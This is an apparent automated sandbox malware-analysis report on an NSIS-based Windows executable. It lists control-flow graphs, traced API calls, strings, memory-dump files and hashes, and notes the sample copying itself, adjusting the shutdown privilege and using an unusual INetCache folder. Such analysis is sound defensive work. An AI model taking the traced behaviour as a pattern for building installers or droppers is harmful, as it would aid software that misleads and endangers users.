lstrcpynW 5384->5390 5387 401b79 5392 406055 lstrcpynW 5387->5392 5389->5384 5390->5387 5391->5381 5392->5385 5393 402537 5394 402562 5393->5394 5395 40254b 5393->5395 5397 402596 5394->5397 5398 402567 5394->5398 5396 402ba2 18 API calls 5395->5396 5406 402552 5396->5406 5400 402bbf 18 API calls 5397->5400 5399 402bbf 18 API calls 5398->5399 5401 40256e WideCharToMultiByte lstrlenA 5399->5401 5402 40259d lstrlenW 5400->5402 5401->5406 5402->5406 5403 4025e0 5404 4025ca 5404->5403 5405 405cdc WriteFile 5404->5405 5405->5403 5406->5403 5406->5404 5407 405d0b 5 API calls 5406->5407 5407->5404 5408 4014b8 5409 4014be 5408->5409 5410 401389 2 API calls 5409->5410 5411 4014c6 5410->5411 4699 4015b9 4700 402bbf 18 API calls 4699->4700 4701 4015c0 4700->4701 4702 405ab4 4 API calls 4701->4702 4712 4015c9 4702->4712 4703 401629 4705 40165b 4703->4705 4706 40162e 4703->4706 4704 405a36 CharNextW 4704->4712 4708 401423 25 API calls 4705->4708 4707 401423 25 API calls 4706->4707 4709 401635 4707->4709 4716 401653 4708->4716 4718 406055 lstrcpynW 4709->4718 4710 405700 2 API calls 4710->4712 4712->4703 4712->4704 4712->4710 4713 40571d 5 API calls 4712->4713 4715 40160f GetFileAttributesW 4712->4715 4717 405683 4 API calls 4712->4717 4713->4712 4714 401642 SetCurrentDirectoryW 4714->4716 4715->4712 4717->4712 4718->4714 5412 10002a7f 5413 10002a97 5412->5413 5414 1000158f 2 API calls 5413->5414 5415 10002ab2 5414->5415

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 8 4032de 1->8 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 8->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 26 4033b1-4033b7 24->26 27 4033aa-4033af 24->27 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 29 4033b9-4033bd 26->29 30 4033be-4033c2 26->30 27->26 27->27 29->30 32 403480-40348d call 405a36 30->32 33 4033c8-4033ce 30->33 48 403491-403497 32->48 49 40348f-403490 32->49 38 4033d0-4033d7 33->38 39 4033e8-403421 33->39 34->35 54 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->54 50 4035f1-403602 call 4037c4 OleUninitialize 35->50 51 403546-40354c 35->51 43 4033d9-4033dc 38->43 44 4033de 38->44 45 403423-403428 39->45 46 40343e-403478 39->46 43->39 43->44 44->39 45->46 52 40342a-403432 45->52 46->32 53 40347a-40347e 46->53 48->24 57 40349d 48->57 49->48 71 403728-40372e 50->71 72 403608-403618 call 40579a ExitProcess 50->72 58 4035e1-4035e8 call 40389e 51->58 59 403552-40355d call 405a36 51->59 61 403434-403437 52->61 62 403439 52->62 53->32 55 40349f-4034ad call 406055 53->55 54->35 54->50 64 4034b2 55->64 57->64 70 4035ed 58->70 75 4035ab-4035b5 59->75 76 40355f-403594 59->76 61->46 61->62 62->46 64->25 70->50 73 403730-403746 GetCurrentProcess OpenProcessToken 71->73 74 4037ac-4037b4 71->74 78 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 73->78 79 40377c-40378a call 40642b 73->79 81 4037b6 74->81 82 4037ba-4037be ExitProcess 74->82 83 4035b7-4035c5 call 405b11 75->83 84 40361e-403632 call 40571d lstrcatW 75->84 80 403596-40359a 76->80 78->79 98 403798-4037a3 ExitWindowsEx 79->98 99 40378c-403796 79->99 89 4035a3-4035a7 80->89 90 40359c-4035a1 80->90 81->82 83->50 95 4035c7-4035dd call 406055 * 2 83->95 96 403634-40363a lstrcatW 84->96 97 40363f-403659 lstrcatW lstrcmpiW 84->97 89->80 94 4035a9 89->94 90->89 90->94 94->75 95->58 96->97 97->50 101 40365b-40365e 97->101 98->74 102 4037a5-4037a7 call 40140b 98->102 99->98 99->102 104 403660-403665 call 405683 101->104 105 403667 call 405700 101->105 102->74 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->50 134->122
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                          • GetVersion.KERNEL32 ref: 004032C8
                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                          • SHGetFileInfoW.SHELL32(0042B228,00000000,?,?,00000000), ref: 0040333B
                                                                                                          • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",00000000), ref: 00403363
                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",?), ref: 0040338A
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                          • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,?,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                          • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                          • ExitProcess.KERNEL32 ref: 00403618
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",00000000,?), ref: 0040362B
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",00000000,?), ref: 0040363A
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",00000000,?), ref: 00403645
                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",00000000,?), ref: 00403651
                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                          • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\m0CZ8H4jfl.exe,0042AA28,00000001), ref: 004036DB
                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00403737
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                          • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                          • String ID: "C:\Users\user\Desktop\m0CZ8H4jfl.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\m0CZ8H4jfl.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                          • API String ID: 3586999533-1225049044
                                                                                                          • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                          • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                          • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                          • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 148 404eb3-404eba 144->148 151 404de4-404deb 145->151 152 404dd7-404dde 145->152 149 404c40-404c5d call 406077 SendMessageW * 2 146->149 150 404c3d 146->150 147->143 153 404c65-404c91 call 404119 * 2 147->153 158 404f2b-404f33 148->158 159 404ebc-404ec2 148->159 149->147 150->149 155 404e60-404e63 151->155 156 404ded-404df0 151->156 152->148 152->151 192 404c97-404c9d 153->192 193 404d5c-404d6f GetWindowLongW SetWindowLongW 153->193 155->148 160 404e65-404e6f 155->160 164 404df2-404df9 156->164 165 404dfb-404e10 call 404a7e 156->165 162 404f35-404f3b SendMessageW 158->162 163 404f3d-404f44 158->163 167 405113-405125 call 404180 159->167 168 404ec8-404ed2 159->168 170 404e71-404e7d SendMessageW 160->170 171 404e7f-404e89 160->171 162->163 172 404f46-404f4d 163->172 173 404f78-404f7f 163->173 164->155 164->165 165->155 191 404e12-404e23 165->191 168->167 176 404ed8-404ee7 SendMessageW 168->176 170->171 171->148 178 404e8b-404e95 171->178 179 404f56-404f5d 172->179 180 404f4f-404f50 ImageList_Destroy 172->180 183 4050d5-4050dc 173->183 184 404f85-404f91 call 4011ef 173->184 176->167 185 404eed-404efe SendMessageW 176->185 187 404ea6-404eb0 178->187 188 404e97-404ea4 178->188 189 404f66-404f72 179->189 190 404f5f-404f60 GlobalFree 179->190 180->179 183->167 186 4050de-4050e5 183->186 210 404fa1-404fa4 184->210 211 404f93-404f96 184->211 195 404f00-404f06 185->195 196 404f08-404f0a 185->196 186->167 198 4050e7-405111 ShowWindow GetDlgItem ShowWindow 186->198 187->148 188->148 189->173 190->189 191->155 200 404e25-404e27 191->200 201 404ca0-404ca7 192->201 199 404d75-404d79 193->199 195->196 197 404f0b-404f24 call 401299 SendMessageW 195->197 196->197 197->158 198->167 204 404d93-404d9b call 40414e 199->204 205 404d7b-404d8e ShowWindow call 40414e 199->205 206 404e29-404e30 200->206 207 404e3a 200->207 208 404d3d-404d50 201->208 209 404cad-404cd5 201->209 204->137 205->167 220 404e32-404e34 206->220 221 404e36-404e38 206->221 224 404e3d-404e59 call 40117d 207->224 208->201 215 404d56-404d5a 208->215 222 404cd7-404d0d SendMessageW 209->222 223 404d0f-404d11 209->223 216 404fe5-405009 call 4011ef 210->216 217 404fa6-404fbf call 4012e2 call 401299 210->217 212 404f98 211->212 213 404f99-404f9c call 404afe 211->213 212->213 213->210 215->193 215->199 236 4050ab-4050bf InvalidateRect 216->236 237 40500f 216->237 245 404fc1-404fc7 217->245 246 404fcf-404fde SendMessageW 217->246 220->224 221->224 222->208 225 404d13-404d22 SendMessageW 223->225 226 404d24-404d3a SendMessageW 223->226 224->155 225->208 226->208 236->183 241 4050c1-4050d0 call 404a51 call 404a39 236->241 239 405012-40501d 237->239 242 405093-4050a5 239->242 243 40501f-40502e 239->243 241->183 242->236 242->239 247 405030-40503d 243->247 248 405041-405044 243->248 249 404fc9 245->249 250 404fca-404fcd 245->250 246->216 247->248 252 405046-405049 248->252 253 40504b-405054 248->253 249->250 250->245 250->246 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->242 256->255
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404B53
                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404B9D
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                          • SetWindowLongW.USER32(?,?,00405128), ref: 00404BC9
                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BDD
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C23
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404D61
                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404D6F
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EF7
                                                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00404F1B
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $M$N
                                                                                                          • API String ID: 1638840714-813528018
                                                                                                          • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                          • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                          • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                          • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 263 403c70-403c7d SetWindowPos 260->263 264 403c83-403c86 260->264 266 403e47-403e4c call 404165 261->266 267 403e09-403e0c 261->267 262->261 263->264 269 403ca0-403ca6 264->269 270 403c88-403c9a ShowWindow 264->270 275 403e51-403e6c 266->275 272 403e0e-403e19 call 401389 267->272 273 403e3f-403e41 267->273 276 403cc2-403cc5 269->276 277 403ca8-403cbd DestroyWindow 269->277 270->269 272->273 294 403e1b-403e3a SendMessageW 272->294 273->266 274 4040e6 273->274 282 4040e8-4040ef 274->282 280 403e75-403e7b 275->280 281 403e6e-403e70 call 40140b 275->281 285 403cc7-403cd3 SetWindowLongW 276->285 286 403cd8-403cde 276->286 283 4040c3-4040c9 277->283 290 403e81-403e8c 280->290 291 4040a4-4040bd DestroyWindow EndDialog 280->291 281->280 283->274 288 4040cb-4040d1 283->288 285->282 292 403d81-403d8f call 404180 286->292 293 403ce4-403cf5 GetDlgItem 286->293 288->274 296 4040d3-4040dc ShowWindow 288->296 290->291 297 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 290->297 291->283 292->282 298 403d14-403d17 293->298 299 403cf7-403d0e SendMessageW IsWindowEnabled 293->299 294->282 296->274 327 403ee1-403ee6 297->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 297->328 302 403d19-403d1a 298->302 303 403d1c-403d1f 298->303 299->274 299->298 307 403d4a-403d4f call 4040f2 302->307 304 403d21-403d27 303->304 305 403d2d-403d32 303->305 308 403d68-403d7b SendMessageW 304->308 309 403d29-403d2b 304->309 305->308 310 403d34-403d3a 305->310 307->292 308->292 309->307 313 403d51-403d5a call 40140b 310->313 314 403d3c-403d42 call 40140b 310->314 313->292 324 403d5c-403d66 313->324 323 403d48 314->323 323->307 324->323 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->275 345 403fb9-403fbb 336->345 345->275 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->283 350 403ffe-40402b CreateDialogParamW 347->350 348->274 349 403fd3-403fd9 348->349 349->275 351 403fdf 349->351 350->283 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->274 352->274 357 40408a-4040a2 ShowWindow call 404165 352->357 357->283
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                          • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                          • DestroyWindow.USER32 ref: 00403CAE
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F52
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                          • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                          • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3282139019-0
                                                                                                          • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                          • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                          • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                          • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 507 4060c4-4060cb 503->507 505 4060d0-4060dd 504->505 506 4062cf-4062da 504->506 505->506 508 4060e3-4060ef 505->508 509 4062e5-4062e6 506->509 510 4062dc-4062e0 call 406055 506->510 507->504 511 4062b0 508->511 512 4060f5-406131 508->512 510->509 514 4062b2-4062bc 511->514 515 4062be-4062c1 511->515 516 406251-406255 512->516 517 406137-406142 GetVersion 512->517 514->504 515->504 520 406257-40625b 516->520 521 40628a-40628e 516->521 518 406144-406148 517->518 519 40615c 517->519 518->519 522 40614a-40614e 518->522 525 406163-40616a 519->525 523 40626b-406278 call 406055 520->523 524 40625d-406269 call 405f9c 520->524 526 406290-406298 call 406077 521->526 527 40629d-4062ae lstrlenW 521->527 522->519 529 406150-406154 522->529 538 40627d-406286 523->538 524->538 531 40616c-40616e 525->531 532 40616f-406171 525->532 526->527 527->504 529->519 534 406156-40615a 529->534 531->532 536 406173-406199 call 405f22 532->536 537 4061ad-4061b0 532->537 534->525 548 406238-40623c 536->548 551 40619f-4061a8 call 406077 536->551 539 4061c0-4061c3 537->539 540 4061b2-4061be GetSystemDirectoryW 537->540 538->527 542 406288 538->542 544 4061c5-4061d3 GetWindowsDirectoryW 539->544 545 40622e-406230 539->545 543 406232-406236 540->543 547 406249-40624f call 4062e9 542->547 543->547 543->548 544->545 545->543 550 4061d5-4061df 545->550 547->527 548->547 553 40623e-406244 lstrcatW 548->553 555 4061e1-4061e4 550->555 556 4061f9-40620f SHGetSpecialFolderLocation 550->556 551->543 553->547 555->556 558 4061e6-4061ed 555->558 559 406211-406228 SHGetPathFromIDListW CoTaskMemFree 556->559 560 40622a 556->560 561 4061f5-4061f7 558->561 559->543 559->560 560->545 561->543 561->556
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,?), ref: 004061B8
                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,?), ref: 004061CB
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
